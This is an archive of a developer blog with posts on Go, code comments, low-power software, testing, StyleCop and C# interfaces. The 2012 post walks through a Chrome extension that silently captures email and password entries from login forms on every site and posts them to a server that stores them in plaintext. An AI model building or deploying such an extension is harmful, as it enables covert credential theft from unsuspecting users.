Monday, January 22, 2018

Why Golang?

After some time working with Go Programming Language (also known as Golang) I decided to ask myself "why go?". OK... I have searched "why golang", if you are a Go programmer you know about the difficulties to use the "go" term on searches.

This language became part of my life after taking a job change decision to work on another company. The new company's engineering team was using Go as its main programming language. I did not ask myself about this point earlier because I believed in the strengths of each member in the new team (I already knew about the excellence of developers at Tempest Security Intelligence) and also had curiosity to learn a new language. I joined the crew and navigated as commanded, until now.

Just to make it clear before starting, I am not dissatisfied with Golang. The question came most in a manner to answer myself why I have never used it before. In my opinion, it is an excellent programming language to write a backend API serving over HTTP and also to create some Unix based tools. Some years after its creation, Go is becoming so popular that many companies in Brazil (such as Mercado Livre, Globo.com, Magazine Luiza, and Walmart) are changing their backend solutions to use Go instead of other languages.

Previously I have worked with several different programming languages using many different tools. In this way, I know that Go has a lack of good free tools for developers. But in my opinion the language itself worths, even without some fancy tools. I was never (and I am still not) a programming language fanatic, only took what was better for each situation or, sometimes, what was a client request. Even that I am really satisfied with Go, it is not a love letter.

Golang may appear more verbose when compared with some other languages, but its simplicity makes it easy to learn (mainly for Java and C programmers). Dave Cheney reported about Golang simplicity and also mentioned that "what makes Go successful is what has been left out of the language, just as much as what has been included". Given my experience with Java, I still miss some functionalities such as annotations to ease on my API definitions, but the usage of middlewares allow me to live in peace without them.

Even raising my points, I will not extend in the explanation of each benefit that makes me accept Go as a good language for a backend API. There is a lot of texts talking about the subject and sometimes comparing with another languages. Enjoy yourself:


Getting back to my personal experience, some of the most valuables benefits of Go usage are: possibility to deploy with just binary replacement, easily perform communication between processes using channels and goroutines, and its error handling structure makes a very clean code. Golang also has pointers, making it fast to note when something is value or reference, but also has garbage collection, allowing developer to live well without freeing memory.

But what is most valuable for me is that Go has a very simple subset of standard libraries focused on some nowadays problems. To illustrate better, lets listen on a port 8080 to provide some web content:
main
import (
  "fmt"
  "net/http"
)
func main() {
  http.HandleFunc("/",
      func(w http.ResponseWriter, r *http.Request) {
        fmt.Fprintf(w, "Here goes my HTTP response...")
      })
  http.ListenAndServe(":8080", nil)
}
That is it, no web container, no necessary runtime dependency, no server. Just build, deploy, and run. At the end, Go simplicity is the key feature I believe that is necessary to deliver good products.

Sunday, December 23, 2012

Creating a Google Chrome extension to store passwords

The Google Chrome provides the possibility to create applications (extensions) that can be executed on the browser. To start writing these kinds of applications, the developer page has a very good documentation about how to start and an overview about the extensions. This post aims to demonstrate a simple way to communicate with a server to store login attempts (with e-mail and password) on a file. The data to be stored will be retrieved from a known web page. It is possible to find many password storage applications that makes something similar on Chrome Web Store.


Important notice. The knowledge obtained here must be used consciously. Please, do not inflict the privacy rights of anyone.


Everything starts on the manifest.json file. It is the entry point that contains the information about the extension. For this sample the manifest contains the following information.

{
    "name": "<extension name>",
    "version": "1.0",
    "manifest_version": 2,
    "content_scripts": [
        {
            "matches": [
                "http://*/*",
                "https://*/*"
            ],
            "js": ["contentscript.js"]
        }
    ],
    "background": {
        "scripts": ["background.js"]
    },
    "permissions": [
        "http://*/*",
        "https://*/*"
    ],
    "description": "<extension description>"
}

Extensions code can be written using JavaScript. The files contentscript.js and background.js referred on the manifest contain the code of the extension and each one will be explained on this post.


At first, on this example the web page to save the password has a HTML Form like the following one. On this form, the label tag represents the login button.

<form id="login_form">
    <input type="text" id="email">
    <input type="password" id="pass">
    <label id="loginbutton">
        <input type="submit">
    </label>
</form>

One of the features of Chrome extensions is that it can have JavaScript code executed in the context of the web page. It is possible using content scripts. This feature is used on this sample by the contentscript.js file. The approach used here was to find the HTML Form and Label of the web page and add a listener to each one. It was made adding the following code to the contentscript.js file.

// function to be called by the login button click
function onLogin() {
    ...
}

// retrieve the login button and form elements of the page
var loginButton = document.getElementById("loginbutton");
var loginForm = document.getElementById("login_form");

// verify if the login button exists
if (loginButton) {    
    // add a click listener to the button
    loginButton.addEventListener("click", onLogin, false);
}

// verify if the login form exists
if (loginForm) {    
    // add a submit listener to the form
    loginForm.addEventListener("onSubmit", onLogin, false);
}

The next step is to implement the onLogin() function, that will be called when the user try to make a login. This function will extract the "email" and "pass" elements of the page. If the code is able to find these elements, it will create a content to be stored with the values.

function onLogin() {
    // retrieve the login and pass elements
    var mail = document.getElementById("email");
    var pass = document.getElementById("pass");
        
    // verify if the elements exist
    if (mail && pass) {        
        // create the content to be saved
        var content =
            "login attempt with " + mail.value +
            " and pass " + pass.value +
            " on the domain " + document.domain;
           
        // save the content
        saveContent(content);
    }
}

Note that was called a function saveContent(). This function will contain something like the code below.

function saveContent(content) {   
    chrome.extension.sendMessage(
        {greeting: content},
        function(response) {
            // silence
        }
    );
};

The saveContent() function receive the data and send it on a message. This message will be received on the background page, represented by the background.js file. The code on the background page that will receive the message is the following one.

// send a string value to be saved on server
function saveOnServer(content) {
    ...
};

// create a listener to the messages
// that come from the content script
chrome.extension.onMessage.addListener(
    function(request, sender, sendResponse) {
        // save the content on the server
        saveOnServer(request.greeting);
    }
);

The function saveOnServer() makes a POST HTTP request to the server in order to store the data. The server used here is a PHP one and the page that stores the content is http://localhost/sample/sample.php.

// send a string value to be saved on server
function saveOnServer(content) {
    var url = "http://localhost/sample/sample.php";
    var params = "content="+content;
        
    // create the XMLHttpRequest to send
    // the informations to server
    var http = new XMLHttpRequest();  
    http.open("POST", url, true);

    // send the proper header information
    http.setRequestHeader(
        "Content-type",
        "application/x-www-form-urlencoded"
    );

    // call the function when the state changes.
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {
            // it could be alert(http.responseText);
            // but silence
        }
    }

    // send the parameters
    http.send(params);
};

The HTTP request was made on the background page due to same origin policy. Then it uses the Cross-Origin XMLHttpRequest feature that allows an extension to access remote servers outside of its origin.


Another file used in this example is the sample.php that will be accessed on the XMLHttpRequest of the background page. The technology used on the server could be replaced by any other. The code of the sample.php file is represented below. The $filename represents where the file must be stored.

<?php
    $filename = 'C:\\sample\\sample.txt';
    $param = $_POST["content"];
    $content = " ----- " . $param . " ----- " . "\n";

    if (!$handle = fopen($filename, 'a')) {
         echo "cannot open file ($filename)";
         exit;
    }

    if (fwrite($handle, $content) === FALSE) {
        echo "cannot write to file ($filename)";
        exit;
    }

    echo "($content) writen on file ($filename)";

    fclose($handle);
?>

On this sample the password was stored in a server file without any kind of cryptography. This post brings a lesson. It shows that it is necessary to understand the risks of using a software that stores passwords. It is important to not rely on every software with this proposal. The informations here gives to a developer the support to create his own application and give him the control about the data that are being used. But of course, there are many other security things that the developer must take care while creating this kind of application.

Tuesday, November 1, 2011

Writing good (no) comments

Have you ever wrote something to someone else read? Of course you did! We are always writing something to someone, even for ourselves. And this is how I want to start defending my idea: write a piece of software is just like write a simple text, an article, a paper or even a book. You write it, and you write it clear, so anyone (even yourself) can read it later.


Let’s see an example of that. Suppose your are writing an e-mail to a friend of yours. Do you write a comment about what you wrote? Let me show you:

“Dear ‘Friend of Mine’, how are you? Have you started reading that book? (comment: I’m talking about the book of John Doe). I have just finished the reading of that other book (comment: I’m talking about Alice Cooper book) and I’m wondering if I can go there (comment: your house) and get another book.“

Will your friend understand what you wrote? Probably yes! But, is it a good reading? Can you read smoothly? Probably not! Why can’t you put all the information, that are in the form of comments, inside the text itself? Let’s see how it could be:

“Dear ‘Friend of Mine’, how are you? Have you started reading John Doe’s book? I have just finished the reading of the Alice Cooper one. And I was wondering if I can go to your house and get another one.”

If you are reading this blog you are probably a developer! And if yes, you have also started to get what I’m trying to say here. Writing software is just like writing a piece of text, the only difference is that your are writing instructions, but you are writing it in a different language.


There is also a problem, most of us write code in a way that is enough for the computer to understand. If it compiles, than the computer will understand and the code is OK. That’s not true! Because the computer is not the only one that is going to read that “text”. If your software is not dead, you will read the source code later, other developers will, and even good testers will probably want to read it too.


I like a sentence that I’ve read in uncle Bob’s book, Clean Code, that says:

“The proper use of comments is to compensate for our failure to express ourself in code.”

He means that if we need to write some comment on our code to explain what we are doing, it means that we are not skilled enough, on the language we are using, to express ourselves. Read uncle Bob’s book awoke me to care about my code. But getting this point of view, about self expression on source code, was the most valuable jewel I’ve found on it.


I can’t dive into all the bad things about writing comments, that would be a “copy” of his book. So I prefer to encourage you to read the entire book, specially the chapter 4.


I also wanna close this post citing Steve McConnell:

"Good code is its own best documentation. As you're about to add a comment, ask yourself, 'How can I improve the code so that this comment isn't needed?'"

Tuesday, October 18, 2011

How far goes the systems optimization?

One field of computer that gained a lot of strength is the ubiquitous computing, it supports the theory of provide processing capacity to things that we use every day like microwave ovens, smartphones, tablets and other equipaments . Therefore, the industry is producing many devices with low-cost processors called microcontrollers, able to realize tasks even more complex.


Most of these foregoing equipaments works with batteries, because of that,they have a limmited capacity of power supply. Considering this limitation, the scientific community have researched much to optimize the software execution in these devices in order to consume a smaller amount of energy without affect much of their performance. In this post we intend to argue on some techniques to do it.


Some preliminary studies focus on low power consumption by systems, were based on a technique that scaling voltage and frequency during software execution. Furthermore, this technique selects the mode of work of the system as a whole without considering the device status. This technique, called DPM, is based on the principle that CPU power consumption decreases with the cube of voltage while frequencies scale linearly with voltage.


From this initial idea, emerged other frameworks[1][2] that began considering the devices status and workload of them as well as to realize an analysis of the energy consumed by the modules and identifying the points of the system that consume more energy. Therefore the system designer can refactoring the software to use the foregoing parts only when they are really necessary. As an example, we can cite the smartphones that are sold nowadays, they can detect when the remaining charge of the battery is low and in this case reduce the luminosity of the display and the use of network resources.


Another line of studies supports the refactoring and optimization of source code in order to execute all the system in SRAM of the device. This type of memory, as we know, has an extremely fast access to data and consumes less energy than DRAM memories that are usually used in desktop computers.


This text is only one general view about some researches realized to build systems with low power consumption. At the end, writing good code is not just a manner of maintainability, but also power saving that enables ubiquitous computing become a reality, so dive into it.

Tuesday, October 11, 2011

Developers vs Testers... Fight!!!

This text is a review of the one posted on Bytes Don't Bite.


Should people, who work with software testing, have development skills? The business knowledge is necessary for professionals in the testing area, but understanding about the structure of what is tested, which is primarily a software, is also important.


James Whittaker, who worked at Microsoft on testing and currently works at Google, wrote a book that demonstrates some techniques to "break" a software. The displayed faults are interesting, and likely to be achieved in black-box approach. The book demonstrates failures that can be caused by the user interface or through other software. Whittaker also says that many developers have difficulty to understand the environment in which the software works.


In the experience I had with software testing until now, I had the opportunity to work with several kind of testers that only interact with buttons, or other visual components, which are offered through specifications. Such testers disregarded file system, external components, operating system, network, relationship with other features, etc..


With this post, I want to encourage a fight.


Software testers, you must learn where the developers leave the bugs. Believe me, most of the failures of software are in the code! Consider different ways to find the problems. Understand the operating system, examine the software source code, understand networks, study the shortcomings of the used frameworks, study how to verify the security of the product (do not use the excuse that security is a non-functional requirement), consider all that is valid to ensure software quality.


Developers, will you let the testers break your code? See what these testers can do with the code produced by you! Approach to the thought of the testers, see how they act. Develop a critical thinking. Work hard to not let common flaws happen. Study where the bugs appear, to be able to avoid them!


At the end, this healthy dispute, between preventing and find bugs, is a way to get a software with quality and a team in continuous evolution.

Tuesday, September 20, 2011

Microsoft Source Analysis for C#

Unless you are already used to (and we hardly do), one of the hardest things when writing code is to maintain it well documented and well formatted to everyone (even to ourselves) understand what is writing.


Computers cannot review our source code, yet! Thinking on that, a Microsoft employee developed a tool called StyleCop, that, although not used by everyone within the company, has greatly helped lots of teams to maintain their code well organized.


Here you can find the history of the tool and a short explanation on why some Microsoft employees do not follow the (about) 200 rules established by StyleCop.


The tool integrates quite well with Visual Studio allowing different configurations for each project. Downloading the SDK allows you to customize it and even write your own rules. There is also a plugin for StyleCop called StyleCop+ with lots of other rules that can be used to standardize the source code of your project.

Tuesday, September 6, 2011

List or IList: that is the question

On a day during a conversation at work, a question arises: Why do so many developers always refer to List<T> instead of IList<T> in C#? But a convincing answer to this question did not appear. Thus the principle to depend on abstractions and not on concrete implementations was being despised.


Apparently it was not the first time that this question appears. And it is possible to notice that most developers using List<T> instead of IList<T> had been Java programmers one day. Is this the reason?


In C# it is common to use the letter "I" at the beginning of interface names. People who have programmed in Java might be confused since List represents an interface (in Java) while LinkedList and Stack are examples of implementations. It is also important to note that in C#, LiskedList<T>, Queue<T> and Stack<T> do not implement IList<T>, because they do not provide access by index.


It became necessary to understand the generic class List<T>, and the interfaces that it implements (IEnumerable<t>, ICollection<T>, IList<T>, IEnumerable, ICollection and IList). Thus, such interfaces could be used as a reference instead of the concrete class.


With that understanding about interfaces in mind, it was necessary to make some refactoring in the code where List<T> was being used. At first, replacing at least the return of a method from IList<T> to IEnumerable<T>. With this change, some compilation errors appeared, the method Add(T) was missing. But with ICollection<T> the code worked normally. In some other cases the IEnumerable<T> met the need because it only had to scroll through the list of items returned.


Later, we found a situation that was necessary to access a specific item of the structure, which was solved using the IList<T> interface in the return. Then a AddRange(IEnumerable<T>) method of List<T> was being used, which could easily be replaced with an extension method for ICollection<T>.


But after all these the question number two came up: Were all operations being conducted in the correct place? Since the return of each method was more conscious, it was easier to notice that certain classes were doing more than they should.


At the end, the refactoring was successful, returns of all methods that were using List<T> have been replaced by an appropriate interface. With a little more research it was possible to notice that not only developers accustomed with the List interface in Java were referring to List<T> in C#, but many people use the reference to List<T> due to resources provided by the implementation. A method as AddRange(IEnumerable<T>) could be called anywhere. A tempting proposal. However, relying on abstractions makes the code to become more flexible. And relying on interfaces that only contains the necessary functionality, limited to not try to do in a class which should not be her responsibility.